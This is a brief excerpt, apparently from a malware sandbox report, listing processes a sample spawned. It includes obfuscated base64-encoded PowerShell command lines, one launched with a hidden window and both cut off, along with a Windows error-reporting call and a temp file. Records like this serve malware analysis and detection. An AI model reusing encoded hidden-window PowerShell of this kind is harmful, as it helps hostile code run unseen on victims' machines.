Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABJAGIAYQB0AGQAbwBtAD0AKAAnAE0AYwAnACsAKAAnAHoAJwArACcAbgBpACcAKQArACcAcgA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAGUAUgBwAFIATw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %TEMP%\937098.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABJAGIAYQB0AGQAbwBtAD0AKAAnAE0AYwAnACsAKAAnAHoAJwArACcAbgBpACcAKQArACcAcgA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAGUAUgBwAFIATw... (with hidden window)